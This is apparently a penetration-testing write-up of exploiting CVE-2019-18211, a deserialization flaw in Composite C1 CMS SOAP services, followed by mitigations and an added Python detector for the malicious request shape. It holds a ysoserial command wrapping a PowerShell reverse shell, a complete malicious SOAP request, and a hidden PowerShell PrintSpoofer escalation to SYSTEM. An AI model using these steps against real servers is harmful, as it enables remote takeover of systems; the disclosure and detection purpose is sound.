Introduction
This post demonstrates the black-box exploitation of Composite C1 CMS through the deserialization vulnerability tracked as CVE-2019-18211. The flaw exists in specific SOAP-based web services within the CMS and allows any user with low-level privileges (e.g., Editor) to execute arbitrary code remotely (RCE) on the target server.
The attack was performed without source code access, relying solely on external enumeration, service discovery, and payload delivery techniques.
Discovering the CMS Administration Panel
A directory scan revealed that the CMS administrative interface was exposed at the following path:
/Composite
Version Identification
After accessing the panel, the CMS version was identified through the "?" → About C1 Composite menu.
Example version string obtained during testing:
Composite C1
Build no. 5.0.5827.21806
This version is known to be vulnerable to CVE-2019-18211.
Locating SOAP Services
Using Burp Suite during navigation, a WSDL file was discovered:
GET /Composite/services/Tree/TreeServices.asmx?WSDL
This WSDL file was then parsed using a WSDL parsing extension in Burp to enumerate available methods and parameters.
Target Method: GetMultipleChildren
Analysis of the WSDL output revealed the GetMultipleChildren method within the TreeServiceFacade.
This method accepts an EntityToken parameter, which is handled by the EntityTokenSerializer class in Composite.dll.
The vulnerability exists because this class performs unvalidated deserialization of wrapped BinaryFormatter payloads, allowing arbitrary code execution on the server.
Generating a Malicious Payload
The vulnerable code uses BinaryFormatter via Microsoft.Practices.EnterpriseLibrary.Logging.Formatters.BinaryLogFormatter.
To exploit this, a malicious payload was generated using ysoserial.
First, a PowerShell reverse shell command was prepared and Base64-encoded. Then, ysoserial was used:
ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "powershell -e <Base64-Encoded-Payload>" -o base64
Crafting the SOAP Request
The payload was embedded into the EntityToken parameter. The request structure was modified as follows:
<man:EntityToken>
entityTokenType='Microsoft.Practices.EnterpriseLibrary.Logging.Formatters.BinaryLogFormatter'
entityToken='<Base64-Payload>'
</man:EntityToken>
A complete SOAP request example:
POST /Composite/services/Tree/TreeServices.asmx HTTP/1.1
Host: targetsite.com
SOAPAction: "http://www.composite.net/ns/management/GetMultipleChildren"
Content-Type: text/xml;charset=UTF-8
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:man="http://www.composite.net/ns/management">
<soap:Header/>
<soap:Body>
<man:GetMultipleChildren>
<man:clientProviderNameEntityTokenPairs>
<man:RefreshChildrenParams>
<man:ProviderName>test</man:ProviderName>
<man:EntityToken>entityTokenType='Microsoft.Practices.EnterpriseLibrary.Logging.Formatters.BinaryLogFormatter' entityToken='<Base64-Payload>'</man:EntityToken>
</man:RefreshChildrenParams>
</man:clientProviderNameEntityTokenPairs>
</man:GetMultipleChildren>
</soap:Body>
</soap:Envelope>
Remote Code Execution
Once the SOAP request was sent to the vulnerable endpoint, the malicious payload was deserialized by the server, resulting in successful remote code execution and a reverse shell connection.
Privilege Escalation (Bonus)
Post-exploitation enumeration revealed SeImpersonatePrivilege enabled on the compromised host.
This allowed privilege escalation to SYSTEM using PrintSpoofer:
PrintSpoofer64.exe -c "powershell -nop -w hidden -e <Base64-Encoded-Shell>"
Conclusion
This assessment demonstrates how Composite C1 CMS installations running vulnerable versions are susceptible to CVE-2019-18211, allowing attackers to achieve remote code execution via insecure deserialization in SOAP services.
Mitigation Recommendations:
Upgrade to the latest version of C1 CMS.
Restrict access to /Composite and its SOAP endpoints.
Disable or secure WSDL file access in production environments.
Implement safe serialization practices and avoid BinaryFormatter where possible.
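For defenders who capture request bodies at a WAF or reverse proxy, the following added example (not part of the original assessment and not Composite's code) flags the request shape shown above: an EntityToken whose entityTokenType names a serialization formatter, or whose entityToken is Base64 that decodes to a BinaryFormatter stream header. It assumes the token string layout shown in this post; the sample requests and the type name Example.PageEntityToken are constructed for illustration.

```python
import base64
import binascii
import html
import re

# Leading bytes of every BinaryFormatter stream (its SerializationHeaderRecord).
BINFMT_MAGIC = bytes.fromhex("0001000000ffffffff")
# Assumption: the affected services sit under this prefix, as TreeServices.asmx does.
SERVICE_PREFIX = "/composite/services/"
FORMATTER_NAMES = ("BinaryLogFormatter", "BinaryFormatter")
TOKEN_RE = re.compile(
    r"entityTokenType\s*=\s*'([^']*)'\s*entityToken\s*=\s*'([^']*)'", re.S)


def is_binaryformatter_blob(value):
    """True if value is Base64 whose decoded bytes start a BinaryFormatter stream."""
    compact = "".join(value.split())
    try:
        raw = base64.b64decode(compact + "=" * (-len(compact) % 4), validate=True)
    except (binascii.Error, ValueError):
        return False
    return raw.startswith(BINFMT_MAGIC)


def inspect_request(path, body):
    """Return a list of findings for one logged POST (URL path and raw body)."""
    if not path.lower().startswith(SERVICE_PREFIX):
        return []
    findings = []
    # Undo XML escaping first so &apos;-quoted fields are not missed.
    for token_type, token in TOKEN_RE.findall(html.unescape(body)):
        if any(name in token_type for name in FORMATTER_NAMES):
            findings.append("entityTokenType names a formatter: " + token_type)
        if is_binaryformatter_blob(token):
            findings.append("entityToken decodes to a BinaryFormatter stream")
    return findings


# Constructed samples: the blob is a bare stream header with no object graph,
# and Example.PageEntityToken is a hypothetical benign type name.
INERT_BLOB = base64.b64encode(BINFMT_MAGIC + bytes(8)).decode()
WRAP = "<man:EntityToken>entityTokenType='%s' entityToken='%s'</man:EntityToken>"
TREE = "/Composite/services/Tree/TreeServices.asmx"
SAMPLES = {
    "benign": (TREE, WRAP % ("Example.PageEntityToken", "home-page")),
    "formatter": (TREE, WRAP % (
        "Microsoft.Practices.EnterpriseLibrary.Logging.Formatters.BinaryLogFormatter",
        INERT_BLOB)),
    "escaped": (TREE, (WRAP % ("Example.PageEntityToken", INERT_BLOB)).replace("'", "&apos;")),
}
```

Standard IIS access logs do not record POST bodies, so this check needs a capture point that does (WAF, reverse proxy, or request-body logging).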
References
https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2019-18211
https://medium.com/@frycos/yet-another-net-deserialization-35f6ce048df7
https://github.com/pwntester/ysoserial.net